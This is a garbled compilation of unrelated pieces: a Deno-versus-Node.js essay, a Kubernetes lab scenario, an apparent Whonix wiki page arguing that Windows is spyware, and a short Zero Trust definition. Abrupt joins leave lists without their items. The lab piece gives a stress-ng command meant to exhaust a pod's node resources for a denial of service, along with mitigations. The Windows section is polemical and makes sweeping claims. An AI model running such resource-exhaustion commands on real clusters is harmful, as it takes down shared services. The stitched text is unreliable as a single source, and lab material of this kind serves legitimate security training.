Because the Node.js and web platforms evolved in parallel, and many web APIs came after their Node.js equivalents, they have many differences. There are many examples of this, like the module system and HTTP requests. In the browser, scripts were originally loaded through <script> tags and shared the global window scope. Since HTML and the window were unavailable on the server, Node.js needed a module format. Node.js decided to adopt a form of CommonJS, which was a popular, simple, synchronous module format. However, CommonJS was not native to browsers (you would have to use a library like Browserify), and there were differences between implementations of CommonJS. Years later, in 2015, a new module specification called ECMAScript Modules (ESM) was finalized in ES6. This module specification would work without any libraries in browsers. Additionally, it would solve many problems with CommonJS, like asynchronous module loading and tree shaking. However, it took a while for Node.js to add ESM support, and even after that, ESM adoption in Node.js was not very high, with the majority of NPM packages still only including CommonJS versions. Additionally, Node.js does not have an entirely standards-compliant ESM implementation and differs in things like the handling of .js file extensions. In contrast, Deno only works with entirely standards-compliant ESM. Using one module format makes using Deno a lot simpler for both users and library authors. Speaking from experience, using just ESM is much simpler than shipping both ESM and CommonJS. Deno is also more straightforward in that it sticks to the standards, so you know that your module code works correctly in browsers.

Sending HTTP requests is another area of incompatibility which Deno solves. Node.js allows for HTTP requests through the http/https standard library modules.
However, the modern way of running HTTP requests on the web is through the fetch() API, which is standardized and simpler than http. The most recent versions of Node.js support fetch(). However, Node's fetch() support is limited to very recent versions, so many people have had to turn to packages like node-fetch for the simplicity of fetch(), or cross-fetch for full cross-platform compatibility. This is problematic because it is another dependency, and it is not immediately available without importing. However, all versions of Deno support the fetch() API by default, which solves these problems.

The ecosystem is currently the biggest problem with Deno and a big reason why most Node.js developers are not migrating to it (this is a nasty problem, because if Node.js developers don't migrate, the ecosystem grows more slowly). There are 6,350 modules on deno.land/x, compared to 2 million on NPM. However, many people use other package hosting services (see "Decentralised Module Hosting" above), and most modern web packages should work on Deno. Many Node.js packages should also work on Deno, as Deno includes polyfills for Node.js APIs and the ability to load NPM modules using the npm: specifier. However, the polyfills are not perfect, and some Node.js packages might not work.

Deno is very actively developed, with monthly releases and new features in each release. Deno is even backed by an official company, which can be either good or bad depending on how you look at it. There are more than 600 contributors to Deno, and the number is growing. Basically, Deno is a very actively maintained project.

Deno can be deployed fairly widely, although not as widely as Node.js. Deno has decent support for various container services. Deno.land provides an official Docker image for services that support Docker. However, while most popular container services support Deno, the support is often unofficial and not always maintained. Here is a list of tools and resources for running Deno on container services:

Serverless is where the Deno Company comes in. Their primary commercial offering is Deno Deploy, a serverless edge function runner for Deno scripts. It is conceptually similar to Cloudflare Workers in that it uses V8 isolates for ultra-fast startup times. The advantage of Deno Deploy is that it includes the Deno API and all of the other features that make Deno so helpful. However, there are still other options that might be better. Here is a list of tools and resources to run Deno on various serverless function providers:
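To close out the fetch() point above: a one-file Deno script needs nothing but network permission to make an HTTP request. This is a minimal sketch; status.ts is a hypothetical file name:

# status.ts contains a single line, using top-level await:
#   console.log((await fetch("https://example.com")).status);
deno run --allow-net=example.com status.ts

Running the same script without --allow-net makes Deno fail or prompt for network access (depending on the Deno version) instead of granting it silently, which is exactly the permission model described earlier.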
When there is no resource specification in the Kubernetes manifests and no limit ranges are applied for the containers, an attacker can consume all the resources of the node where the pod/deployment is running, starve other workloads, and cause a DoS for the environment.
- To get started with the scenario, navigate to http://127.0.0.1:1236
- This deployment's pod has no resource limits set in the Kubernetes manifests, so we can easily perform operations that consume large amounts of resources.
- This pod has the stress-ng utility installed and ready to use:
stress-ng --vm 2 --vm-bytes 2G --timeout 30s
- You can see the difference by running the following before and after the stress test:
kubectl top pod hunger-check-deployment-xxxxxxxxxx-xxxxx
This attack may not work in some cases, such as with autoscaling, resource restrictions, etc.
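As a mitigation sketch: resource requests and limits can be declared in the pod spec, or patched onto a running deployment. The values below are illustrative, and the deployment name is taken from the scenario above:

# cap the deployment so a single pod cannot starve the node
kubectl set resources deployment hunger-check-deployment --requests=cpu=250m,memory=256Mi --limits=cpu=500m,memory=512Mi
# re-run the stress test and confirm consumption stays within the limits
kubectl top pod

With a memory limit in place, the container is OOM-killed when it exceeds the limit, and a CPU limit throttles it, so the stress test no longer degrades neighboring workloads. A namespace-wide LimitRange achieves the same for pods that omit their own limits.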
Microsoft Windows Hosts

Table: Windows Backdoors

|User Content Upload to Microsoft||Windows sometimes takes user content, such as documents, and uploads it to Microsoft servers. Sources: Microsoft, Configure telemetry and other settings in your organization (web archived website). Media also reported on this. The Register: Windows 10 telemetry secrets: Where, when, and why Microsoft collects your data [archive]. ZDNet: Windows 10 telemetry secrets: Where, when, and why Microsoft collects your data [archive]. Researchgate: Call Home: Background Telemetry Reporting in Windows 10 [archive]. Alternative write-up, Scaring: Windows 10 lets Microsoft access your own local files [archive]. In theory it might be possible to disable this behavior, but there have also been cases where these settings have not been honored, as documented in the chapter Inescapable Telemetry. There is a privacy-by-policy safeguard implemented at the Microsoft organisational level. Quote: "However, before more info is gathered, Microsoft's privacy governance team, including privacy and other subject matter experts, must approve the diagnostics request made by a Microsoft engineer." However, privacy by policy is not privacy by design (privacy enforced through technology). Generally speaking, there is a history of privacy-by-policy safeguards being circumvented by malicious employees (insider attacks) and by hacking (outsider attacks), and privacy by policy also fails in case of government requests. Microsoft's privacy governance team would be circumvented if Microsoft were compelled through a government order. While there exists (to the knowledge of the author) no law that allows the government to compel companies to add new surveillance capabilities or new backdoors to operating systems, Microsoft may receive orders which it would never be allowed to talk about due to a gag order [archive]. Microsoft's U.S. National Security Orders Report [archive] states that Foreign Intelligence Surveillance Act (FISA) [archive] orders for the period of July - December 2019 comprised 0 - 499 orders seeking disclosure of content, with 14,500 - 14,999 accounts impacted by orders seeking content. Some orders probably related to hosted accounts such as the Microsoft Live e-mail service or Skype. It is unknown whether that might also include user content from Windows. FISA is just one type of order that includes a secrecy order (gag order) by the U.S. government. Microsoft must also abide by other types of government orders, as well as by orders from governments of different countries [archive].|

|Encryption||Microsoft has backdoored its disk encryption. Disabling this requires awareness of the issue, the skill of using search engines to find documentation on how to do so, and the technical skill to disable this privacy intrusion. This is often not the case for non-technical users. (The Tyranny of the Default)|

|Software Choice and Deletion||

Table: Windows Surveillance Threats

Windows 10 comes with a keylogger. Quoting the 2015 version of Microsoft: Windows 10 speech, inking, typing, and privacy FAQ [archive]. Note: any deletion mentioned in the quote is only a promise. If data was previously leaked, shared with other parties, or requested through a government order, it would not be deleted. Such data is vulnerable to Keystroke Deanonymization.
Quote from the 2020 Microsoft: Windows 10 speech, inking, typing, and privacy FAQ [archive]: this means Windows is recording the voice of the user and storing it on servers owned by Microsoft. The same website mentions this can be disabled. But disabling it requires awareness of the issue, the skill of using search engines to find documentation on how to do so, and the technical skill to disable this privacy intrusion. This is often not the case for non-technical users. (The Tyranny of the Default)

Quote from the Microsoft Privacy Statement, Last Updated: March 2021 [archive]: this sounds rather theoretical. "Collect samples" - how many samples? "Processed to remove" data "which could be used to reconstruct the original content or associate the input to you" - how well does that processing work? Such data is vulnerable to Voice Deanonymization.

|Telemetry and Personal Data||
|Windows Error Reporting (WER) and Core Dumps Privacy Issues||

Windows User Freedom Restrictions

A number of conscious decisions by Microsoft severely limit user freedoms.

Table: Windows User Freedom Threats

The German government's Ministry of Economics and Federal Office for Information Security (BSI) do not trust Microsoft Windows. What was it that ZEIT ONLINE needed to redact? Quote from BSI-2i.pdf, German government internal documents leaked on WikiLeaks [archive] (DeepL translated). Heise: German authorities are losing control over critical IT systems (German language, use DeepL and/or Google Translate).

|Forced Updates||Microsoft has a history of updating software without permission [archive]. While configurable update reminders are good for those who forget to regularly update, forced updates are problematic for those who do not wish to update. This Windows issue had not been foreseen; to the knowledge of the author, there were no popular "really disable all Windows updates" instructions. By comparison, such an issue is unlikely to happen with Debian-based operating systems (and many derivatives) and other Freedom Software Linux distributions. On Windows, there was no real way to check which code would run when. Or at least, for practical purposes, nobody did the reverse engineering and documented it. For example, on Debian(-based) operating systems, the default package manager APT is fully Open Source. But even without reading the source code, its behavior is much more predictable. Software sources are defined in easily human-readable files such as /etc/apt/sources.list.|

|Tiered Stability (Updates Testing)||Windows forces lower-paying customers to install new updates and gives higher-paying customers the option of whether or not to adopt them. Quote [archive]:|

|Forced Telemetry into C++ Binaries|

Microsoft has a history of informing adversaries of bugs before they are fixed. Microsoft reportedly gives adversaries security tips [archive] (archive.is [archive]) on how to crack into Windows computers. Microsoft Corp. (MSFT), the world's largest software company, provides intelligence agencies with information about bugs in its popular software before it publicly releases a fix, according to two people familiar with the process. Redmond, Washington-based Microsoft (MSFT) and other software or Internet security companies have been aware that this type of early alert allowed the U.S. to exploit vulnerabilities in software sold to foreign governments, according to two U.S. officials.
Microsoft doesn't ask and can't be told how the government uses such tip-offs, said the officials, who asked not to be identified because the matter is confidential. Frank Shaw, a spokesman for Microsoft, said those releases occur in cooperation with multiple agencies and are designed to give government "an early start" on risk assessment and mitigation.

Compare this with the Linux kernel security team's policy on embargoed security bugs:

Although our preference is to release fixes for publicly undisclosed bugs as soon as they become available, this may be postponed at the request of the reporter or an affected party for up to 7 calendar days from the start of the release process, with an exceptional extension to 14 calendar days if it is agreed that the criticality of the bug requires more time. The only valid reason for deferring the publication of a fix is to accommodate the logistics of QA and large scale rollouts which require release coordination. While embargoed information may be shared with trusted individuals in order to develop a fix, such information will not be published alongside the fix or on any other disclosure channel without the permission of the reporter. This includes but is not limited to the original bug report and followup discussions (if any), exploits, CVE information or the identity of the reporter. In other words our only interest is in getting bugs fixed. All other information submitted to the security list and any followup discussions of the report are treated confidentially even after the embargo has been lifted, in perpetuity.

Fixes for sensitive bugs, such as those that might lead to privilege escalations, may need to be coordinated with the private <[email protected]> mailing list so that distribution vendors are well prepared to issue a fixed kernel upon public disclosure of the upstream fix. Distros will need some time to test the proposed patch and will generally request at least a few days of embargo, and vendor update publication prefers to happen Tuesday through Thursday. When appropriate, the security team can assist with this coordination, or the reporter can include linux-distros from the start.

The crucial difference between Microsoft bug embargoes and Linux bug embargoes is that Microsoft notifies intelligence agencies, which are then known to exploit vulnerabilities, while the Linux kernel security team has a much more transparent embargo process in which trusted parties (major Linux distributions) receive early notification so that the software upgrade containing the fix is widely available before public disclosure, preventing wide exploitation by attackers in the wild.

Open Source / Freedom Software and proprietary, closed-source, precompiled software are totally different development models. Both development models have advantages and disadvantages. The case for Open Source, Freedom Software is made on the Avoid Non-Freedom Software wiki page. However, Microsoft Windows has none of the advantages of Open Source, Freedom Software, but also cannot fully take advantage of security through obscurity either.

Part of the Shared Source Initiative [archive] is the Government Security Program [archive]. Quote ZDNet [archive]: Microsoft's Shared Source Initiative [archive] makes source code available to "qualified customers, enterprises, governments, and partners for debugging and reference purposes". There's almost no information on the company's website about their Government Security Program [archive] (GSP). Just two sentences.
But the first of those sentences notes that requests might come from "local, state, provincial, or national governments or agencies". When the GSP was launched back in 2003, however, Microsoft was happy to tell the media that Windows source code was made available to a number of governments and international organisations, including Russia, NATO, the UK, and China. Another report said that Australia, Austria, Finland, Norway, Taiwan, and Turkey were also on the list. Simplified summary: independent security researchers don't have access to the source code, but huge groups of people, some of whom you probably do not trust, have that advantage over you. The only motivation for sharing the source code is to get regulatory approval for deployment in foreign government networks that demand certain assurances for accessing their markets. This has nothing to do with empowering third parties or giving them the choice and freedom to modify the software or share it with others.

The fact that there is no way to completely remove or disable telemetry requires further consideration. For instance, non-enterprise editions do not permit anyone to completely opt out of the surveillance "features" [archive] of Windows 10. Quote: Even when told not to, Windows 10 just can't stop talking to Microsoft [archive]. Quote: Windows 10 Sends Your Data 5500 Times Every Day Even After Tweaking Privacy Settings [archive]: CheesusCrust also disabled every single tracking and telemetry feature in the operating system. He then left the machine running Windows 10 overnight in an effort to monitor the connections the OS is attempting to make. Eight hours later, he found that the idle Windows 10 box had tried over 5,500 connections to 93 different IP addresses, out of which almost 4,000 were made to 51 different IP addresses belonging to Microsoft. Even if some settings are tweaked to limit this behavior, it is impossible to trust that those changes will be respected. Even the Enterprise edition was discovered to completely ignore privacy settings and anything that disables contact with Microsoft servers. Any corporation which forces code changes on a user's machine, despite Windows updates being turned off many times before, is undeserving of trust. Windows 10 updates have been discovered to frequently reset or ignore telemetry privacy settings. Microsoft backported this behavior to Windows 7 and 8 [archive] for those that held back, so odds are Windows users are already running it.

Forfeited Privacy Rights

By now the reader should be convinced that just by using any version of Windows, the right to privacy is completely forfeited. Windows is incompatible with the intent of Whonix and the anonymous Tor Browser, since running a compromised Windows host shatters the trusted computing base which is part of any threat model. Privacy is inconceivable if any information that is typed or downloaded is provided to third parties, or if programs bundled as part of the OS regularly "phone home" by default [archive].

Targeted Malicious Upgrades

Microsoft Windows is not designed to be resistant to targeted malicious software upgrades of the Windows operating system or of applications from the Windows store. A targeted malicious software upgrade means singling out specific users and shipping malicious upgrades to these select users only. Most users use a Windows Live ID, since that is encouraged by Windows, which links updates to their real names and IP addresses.
When installing or updating applications using the Microsoft Store, Microsoft knows the Windows Live ID, and therefore also the real name and IP address of the user. It follows that a coerced or compromised Microsoft Store could single out users and ship malicious software that includes malware with features such as remote control, remote view, file upload and download, microphone and web camera snooping, keyboard logging and so forth. This is the same situation for any OS shipped with a corporate-controlled walled-garden app store, like those of Apple, Google and Amazon. With knowledge of Microsoft's existing privacy-intrusive behavior, as documented elsewhere on this page, it seems sane to assume that the same applies to Microsoft Update.
- Most Linux distributions usually do not require an e-mail based login to receive upgrades. Users can still be singled out by IP addresses, unless they opt in to using something such as apt-transport-tor, which is not the default.
- In the case of Whonix and Kicksecure, all upgrades are downloaded over Tor. There is no way for the server to ship legitimate upgrade packages to most users while singling out specific users for targeted attacks.

Opinion by GNU Project

The GNU Project's opinion [archive] is that Windows is "Malware", due to the threats posed to personal freedoms, privacy and security, meaning the software is designed to function in ways that mistreat or harm the user. Interpretation of the opinion by the GNU Project, with word definitions: spyware is a type of malware. A wide variety of malware types exist, including computer viruses, worms, Trojan horses, ransomware, spyware, adware, rogue software, wipers and scareware. If that definition is accepted, and one agrees that "Windows is Spyware", it logically follows that "Windows is also Malware". This is to explain the GNU Project's opinion of calling Windows "Malware". Windows is malware by definition because of what it does. Individuals trusting Microsoft as an entity with all the data it collects by default doesn't change that determination.

Opinion by Free Software Foundation

Microsoft uses draconian law to put Windows, the world's most-used operating system, completely outside the control of its users. Neither Windows users nor independent experts can view the system's source code, make modifications or fixes, or copy the system. This puts Microsoft in a dominant position over its customers, which it takes advantage of to treat them as a product [archive].

Microsoft's willingness to consult with adversaries and provide zero days [archive] before public fixes are announced logically places Windows users at greater risk, especially since adversaries buy security exploits from software companies [archive] to gain unauthorized access [archive] into computer systems. Even the Microsoft company president has harshly criticized adversaries for stockpiling vulnerabilities [archive] that, when leaked, led to the recent world-wide ransomware crisis. This is elaborated in the chapter Adversary Collaboration.

To meet reasonable security standards, Microsoft would have to:
- Not upload user data to Microsoft servers.
- Minimize the data stored on, or available to, the servers of Microsoft. (Windows Surveillance)
- Use end-to-end encryption whenever possible.
- Be resilient to targeted malicious upgrade attacks by not linking software installation/upgrading to a Windows ID and/or by providing an option to download software over the Tor anonymity network (or, hypothetically, a next-generation anonymity network developed by Microsoft).
- Not upload full disk encryption keys to Microsoft servers (see chapter Windows Backdoors, category Encryption).

Such security standards are affordable, since Microsoft makes billions in profit, and they are realistic, since some Freedom Software Linux distributions have already implemented them.

Due to Microsoft's restrictive, proprietary licensing policy for Windows, there are no legal software projects providing a security-enhanced Windows software fork [archive]. There are security-enhanced Windows software fork(s), but these are illegal, violate the copyright of Microsoft, and are provided by anonymous developers. In contrast, the Linux community has multiple Freedom Software Linux variants that are strongly focused on security, like Qubes OS [archive]. Microsoft provides Tyrant Security, not Freedom Security. (Tyrant Security vs Freedom Security)

Windows comes with some innovative security technologies; however, privacy and user freedom are terrible. Security and privacy have a strong connection. Quote Bruce Schneier, Security vs. Privacy [archive], The Value of Privacy [archive]: there is no security without privacy. I equate privacy with security because they are very much related in the real world, especially for whistleblowers.

Windows Historic Insecurity

Microsoft updates also use weak cryptographic verification methods such as MD5 and SHA-1. In 2009, the CMU Software Engineering Institute stated that MD5 "...should be considered cryptographically broken and unsuitable for further use". In 2012, the Flame malware exploited the weaknesses in MD5 to fake a Microsoft digital signature. Before Windows 8, there was no central software repository comparable to Linux where software could be downloaded safely. This means a large segment of the population remains at risk, since many Windows users [archive] are still running Windows 7.

Windows Software Sources

On the Windows platform, a common way to install additional software is to search the Internet and install the relevant program. This is risky, since many websites bundle software downloads with adware, or worse, malware. Even if software is always downloaded from reputable sources, those sources commonly act in very insecure ways. For example, if Mozilla Firefox is downloaded from a reputable website like chip.de, then until recently the download would have taken place over an insecure, plain http connection. In that case, it is trivial for ISP-level adversaries, Wi-Fi providers and others to mount man-in-the-middle attacks and inject malware into the download. But even if https is used for downloads, this only provides a very basic form of authentication. To keep a system secure and free of malware, it is strongly recommended to always verify software signatures. However, this is very difficult, if not impossible, for Windows users. Most often, Windows programs do not have software signature files (OpenPGP / gpg signatures), which are normally provided by software engineers in the GNU/Linux world. Tools for digital signature verification, such as SignTool and gpg4win, are not installed by default on the Windows platform. They could be installed manually, but there is a bootstrap issue: these tools themselves would have to be downloaded over https, i.e. with only a very basic form of authentication. In contrast, on the Linux platform the GnuPG software digital signature verification tool is usually installed by default.
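For comparison, this is roughly what manual signature verification looks like on Linux. A minimal sketch with illustrative file names, assuming the signer's public key was obtained over a trusted channel:

# import the developer's public key (obtained out-of-band)
gpg --import developer-signing-key.asc
# verify the downloaded archive against its detached signature
gpg --verify program.tar.gz.asc program.tar.gz

A "Good signature" result only proves the file matches the signature; the key itself still has to be authenticated, for example via its fingerprint published through multiple independent channels.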
For these reasons it is safe to assume that virtually nobody using a Windows platform regularly benefits from the strong authentication that is provided by software signature verification. The Windows 10 App Store does not suffer from this issue and does perform software signature verification, but many applications are not available from the Windows App Store. In the Windows ecosystem, the culture of software signature verification is less widespread. In contrast, most Linux distributions provide software repositories. For example, Debian and distributions based on Debian use apt-get. This provides strong authentication, because apt-get verifies all software downloads against the Debian repository signing key. Further, this is an automatic, default process which does not require any user action. Apt-get also shows a warning should there be attempts to install unsigned software. Even when software is unavailable in the distribution's software repository, in most cases OpenPGP / gpg signatures are available. In the Linux world, it is practically possible to always verify software signatures.

No Ecosystem Diversity Advantage

The popularity of Windows platforms on desktops actually increases the risk, as attackers target the near-monocultural operating system environment with regularity. A security bug is usually exploitable on many versions of Windows wherever they run, making such bugs known in security terms as a "class break". For example:
- The Wanna Decryptor ransomware attack [archive] spreading across the globe at the time of writing is solely focused on Windows platforms.
- Flaws in Internet Explorer and Edge [archive] have previously allowed attackers to retrieve Microsoft account credentials.
- Point-of-sale terminals running Windows were previously taken over in order to collect customers' credit card numbers [archive].

Windows source code is unavailable for public review and cannot be built by independent third parties. Microsoft Windows has none of the advantages of Open Source, Freedom Software, but also cannot fully take advantage of security through obscurity either. This point is made in the chapter on Shared Source. There is no public issue tracker for Microsoft Windows where any reasonable user is allowed to post or reply. There is a public list of vulnerabilities [archive], but without public discussion among developers and/or users. Microsoft's internal issue tracker is private, unavailable to the public even for reading. The public's ability to gain insight into Microsoft's planning and thought processes, or to participate in the development of Windows, is much more limited. This is the case for many closed-source, proprietary software projects: the community cannot participate as much in development. In comparison, for Open Source projects, issue trackers are most often public for everyone to post and reply to (with the exception of security issues under embargo until fixed). When users are having issues and searching for advice, often the advice is to "reinstall Windows". Due to the closed-source nature of Windows, it is far more difficult to analyze issues and provide bug fixes and workarounds. Sometimes reverse engineering is cited as an alternative to the unavailability of Windows source code to the general public. Reverse engineering, however, is far more difficult. For example, the forced updates and forced upgrades issues, with Windows ignoring the user's automatic update settings (documented in the chapter Windows User Freedom Restrictions), had not been foreseen and published by anyone doing reverse engineering.
Users were taken by surprise.

Using Earlier Windows Versions is No Good Alternative

When users learn about the shortcomings, anti-features and spyware features of Windows, they often consider, as an alternative, not upgrading to a newer version of Windows, or downgrading to an earlier version. This is not a solid plan for the future, since security support for older versions of Windows is being dropped, and without security support, newly found security vulnerabilities will remain unfixed.
- Microsoft has dropped support for Windows 7 and 8 on recent processors [archive] following the release of Windows 10.
- Microsoft has made Windows 7 and 8 non-functional on certain new computers [archive], compelling a switch to Windows 10 for many people. For example, support has been dropped for all future Intel [archive], AMD and Qualcomm CPUs [archive].
- Microsoft cuts off support for specific platforms (like XP [archive]) and software such as popular Internet Explorer versions [archive], after a software dependency has developed.

Microsoft has been hostile against Freedom Software. Microsoft is a patent troll. Microsoft claimed that Linux infringed its intellectual property. Microsoft experienced backlash over that claim, but never substantiated the claim, sued anyone, or apologized.

References:
- now defunct website Show Us The Code, archived: http://web.archive.org/web/20071120042104/http://showusthecode.com/responses.htm [archive]
- internet search term: "microsoft" "Show Us The Code"
- https://www.redhat.com/en/blog/microsoft-and-patent-trolls [archive]
- http://www.openinventionnetwork.com/ [archive]
- https://www.eff.org/deeplinks/2015/12/stupid-patent-month-microsofts-design-patent-slider [archive]
- Microsoft used the DMCA (Digital Millennium Copyright Act) to shut down reverse engineering of Skype. See the DMCA notice received and published by GitHub [archive].

The Tyranny of the Default

"'The tyranny of the default' [is] the expression I like to use for: we know most users don't go in and change things. They just assume that someone smarter than them chose the settings that are best for them, and so they say 'YES' a lot when they're asked questions. What that means is that if it's enabled by default, it'll tend to stay on."

Any anti-feature of Windows, such as telemetry, cannot be excused by "but it can be disabled". That is a workaround at best, not a fix. The fact remains: for most users, if it is enabled by default, it will tend to stay on. Changing defaults requires awareness of the issue, the skill of using search engines to find documentation on how to do so, and the technical skill to change the default. This is often not the case for non-technical users. Even technical users might forget in some situations, such as after re-installation. Therefore, default settings matter.

- "reinstall Windows": when users are having issues and searching for advice, often the advice is to "reinstall Windows". Due to the closed-source nature of Windows, it is far more difficult to analyze issues and provide bug fixes and workarounds.
- Windows updates often take a long time and require multiple reboots:
1. The user runs Windows update.
2. Windows downloads and installs updates.
3. A reboot is required; the user reboots. Shutdown takes a long time, since Windows is finalizing some updates.
4. Boot takes a long time, since Windows is finalizing some updates.
5. Windows update reports further updates. Back to step 1.
6. Repeat a few times.
By comparison, on Debian-based distributions, for example, a single "sudo apt-get update && sudo apt-get dist-upgrade" is sufficient to download and install all updates. No extra time is required for shutdown or the next boot. No further updates are required right after reboot.

- Windows displays advertisements [archive] for Microsoft products and those of its partners.
- Windows inserts advertisements inside File Explorer [archive] to nag about paid subscriptions.

Windows is less flexible. While with a Linux distribution it is easily possible to install to a USB drive, or to swap a hard drive installed in one computer and boot it inside a replacement computer, these are major challenges for Windows users. It is hard to modify Windows. For example, Qubes Windows Tools for Windows 10 are still not ready.

Freedom Software Superiority

Based on the preceding sections and analysis, it is strongly recommended to learn more about GNU/Linux and install a suitable distribution to safeguard personal rights to security and privacy. Otherwise, significant effort is required to play "whack-a-mole" disabling Windows anti-features, which routinely subject users to surveillance, limit choice, purposefully undermine security, and harass via advertisements, forced updates/forced upgrades, and so on. See also Avoid Non-Freedom Software.

Can Windows 10 be secure for huge enterprise-level customers? In theory, maybe. These customers might have access to Windows Shared Source, which might [archive] even be complete enough to build Windows from source code. Who knows. It cannot be known for sure, due to the high requirements [archive] to get access to Windows source code and the requirement of signing a non-disclosure agreement (NDA). Even if the author of this page did know, it could not be published here due to the NDA requirement. Such customers might even be able to escape the telemetry that is otherwise inescapable for mere mortals, and to build their own Windows installer ISO and Windows updates from Windows source code. In practice, it is foolish to trust any version coming from an entity that has proved beyond doubt that it is not trustworthy. Much better to move on and instead use sustainable alternatives.

Can Windows 10 be secure for laymen users? Probably not. Due to the Windows Error Reporting (WER) and Core Dumps Privacy Issues, telemetry, spyware and keylogger (see chapter Windows Surveillance), too much private information, including user data, ends up on Microsoft servers, where it is then in part harvested by governments with thousands of employees with which Microsoft is compelled to cooperate. Such data can then be used in parallel construction [archive] (evidence laundering), circumventing constitutional protections against unreasonable searches and seizures. Security updates are necessary for any operating system, but the issue with Microsoft is that they tend to sneak in things other than what users can reasonably expect. In the past, at least, they made changes to the update system so that it would still phone home even if it was disabled. Examples include Inescapable Telemetry and forced updates/upgrades. Windows officially admits to its data-mining activity and gives users so-called options to "choose" what they share. Third parties have uncovered, time and time again, that these user choices are ignored and there is no way to disable data gathering completely.

Does Windows result in a worldwide net gain or net loss of privacy?
A proprietary, security-hardened Windows that resists third-party spyware but includes data snooping in its core = a net loss of end-user freedom/privacy and a security risk, as the NSA has been known to use Windows Error Reporting to aid exploitation. A less security-hardened Freedom Software operating system might be more vulnerable to active attacks, but with no privacy-invasive code included by default = a net gain of privacy by default, as nothing is being reported anywhere unless targeted attacks are deployed.

- Basic Host Security
- Advanced Host Security
- Miscellaneous Threats to User Freedom
- Avoid Non-Freedom Software
- Tyrant Security vs Freedom Security
- Why Whonix ™ is Freedom Software
- Unsubstantiated Conclusions
- Whonix ™ Policy on Non-Freedom Software
- With the ability to be legally allowed to actually talk about it, i.e. without a non-disclosure agreement (NDA).
- modified by author: added link to web archive with quote from 2015
- https://www.government.nl/binaries/government/documents/publications/2019/06/11/dpia-windows-10-enterprise-v.1809-and-preview-v.-1903/DPIA+Windows+10+version+1.5+11+June+2019.pdf [archive]
- Microsoft Privacy Statement for Error Reporting [archive]
- https://rcpmag.com/articles/2002/10/03/microsoft-error-reporting-drives-bug-fixing-efforts.aspx [archive]
- https://www.forcepoint.com/blog/security-labs/are-your-windows-error-reports-leaking-data [archive]

Translated: An internal paper from the Ministry of Economics from early 2012 states that due to "the loss of full sovereignty over information technology", "the security goals of 'confidentiality' and 'integrity' are no longer guaranteed." Elsewhere there are sentences such as: "Considerable effects on the IT security of the federal administration may accompany this." The conclusion accordingly reads: "The use of 'Trusted Computing' technology in this form … is not acceptable for the federal administration or for the operators of critical infrastructures."

Translated: In negotiations regarding TPM usage, it can be pointed out that not only the federal government views the use of TPMs that are not under one's own control critically, but so do large parts of German industry, particularly in critical infrastructures.

Translated: Microsoft therefore argues that it itself needs control over UEFI "Secure Boot" in order to manage UEFI "Secure Boot" securely on behalf of the owner. From the BSI's point of view, the effort required for a self-controlled configuration of UEFI "Secure Boot" is currently high, but urgently advisable, particularly in areas of use with high protection requirements or in critical infrastructures.

Translated: On the one hand, the federal government demands "unrestricted controllability" of computers that keep critical infrastructures running, that is, nuclear power plants and water, energy and transport networks. On the other hand, the responsible authorities do nothing to regain the control already lost to Intel and Microsoft.

- Bundesamt für Sicherheit in der Informationstechnik (Federal Office for Information Security)
- https://www.techrepublic.com/index.php/blog/it-news-digest/microsoft-admits-to-stealth-updates/ [archive]

sudo apt update
...
Get:5 tor+https://deb.debian.org/debian buster-backports InRelease [46.7 kB]
Get:6 tor+https://deb.debian.org/debian-security buster/updates InRelease [65.4 kB]
Get:7 tor+https://deb.debian.org/debian buster-updates InRelease [51.9 kB]
Hit:8 tor+https://deb.debian.org/debian buster InRelease
...
sudo apt dist-upgrade
Reading package lists...
Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
anon-apt-sources-list anon-icon-pack apparmor-profile-dist apparmor-profile-torbrowser bootclockrandomization damngpl dist-base-files gpg-bash-lib hardened-malloc hardened-malloc-kicksecure-enable helper-scripts kicksecure-base-files kicksecure-cli kicksecure-dependencies-cli msgcollector msgcollector-gui open-link-confirmation repository-dist sdwdate secbrowser security-misc tb-default-browser tb-starter tb-updater timesanitycheck tor tor-geoipdb usability-misc vm-config-dist whonix-initializer
30 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 5,957 kB of archives.
After this operation, 732 kB of additional disk space will be used.
Do you want to continue? [Y/n]

- https://www.theguardian.com/technology/2015/sep/11/microsoft-downloading-windows-1 [archive]
- https://www.computerworld.com/article/3012278/microsoft-sets-stage-for-massive-windows-10-upgrade-strategy.html [archive]
- https://web.archive.org/web/20170609221304/https://forums.whonix.org/uploads/default/original/2X/0/004857ec71ff2e4b23c88bf596b6142373fe2879.jpg [archive]
- https://web.archive.org/web/20071011010707/http://informationweek.com/news/showArticle.jhtml?articleID=201806263 [archive]
- https://archive.fo/LffTy [archive]
- https://arstechnica.com/information-technology/2015/07/windows-10-updates-to-be-automatic-and-mandatory-for-home-users/ [archive]
- http://voices.washingtonpost.com/securityfix/2007/09/microsofts_stealth_update_come.html [archive]
- https://www.zdnet.com/blog/hardware/confirmation-of-stealth-windows-update/779 [archive]
- https://community.spiceworks.com/topic/1535835-win-10-update-resets-privacy-again [archive]
- This is especially true for users of Tor, who are regularly targeted in this fashion.
- https://en.wikipedia.org/wiki/MD5#cite_note-11 [archive]
- https://arstechnica.com/security/2012/06/flame-crypto-breakthrough/ [archive]
- https://www.chip.de/downloads/Firefox-64-Bit_85086969.html [archive] https://www.webcitation.org/6mgUDIObc [archive] chip.de now enforces https for its entire website.
- https://www.schneier.com/blog/archives/2017/01/class_breaks.html [archive]
- https://answers.microsoft.com [archive] is mostly(?) user-to-user discussion; it is hard to find any employees posting there, and interaction is very low. A volunteer moderator isn't a developer. [archive] There is also https://techcommunity.microsoft.com [archive].
- Link as evidence pointing to the fact that Microsoft does have an internal issue tracker: https://www.engadget.com/2017-10-17-microsoft-bug-database-hacked-in-2013.html [archive] Example quotes [archive]: "I doubt microsoft is telling everything, im sticking with W7 indefinitely." "Hmm, guess I'm going back to windows 7." "This is why I went from using the beta build as my primary OS back to Windows 8.1. And now myself and everyone in my family will be staying with their current OS (Windows XP, Vista, 7 and 8.1)."
- Because a previous update was a prerequisite for getting the next update.
So what is Zero Trust? Have you ever heard of "Trust, but verify"? Think of Zero Trust as "Never trust, always verify." Zero Trust is a security framework that requires all users, whether inside or outside the organization's network, to be authenticated, authorized, and continuously validated for security configuration and posture before being granted or keeping access to applications and data. Zero Trust was created based on the realization that traditional security models operate on the outdated assumption that everything inside an organization's network should be implicitly trusted.

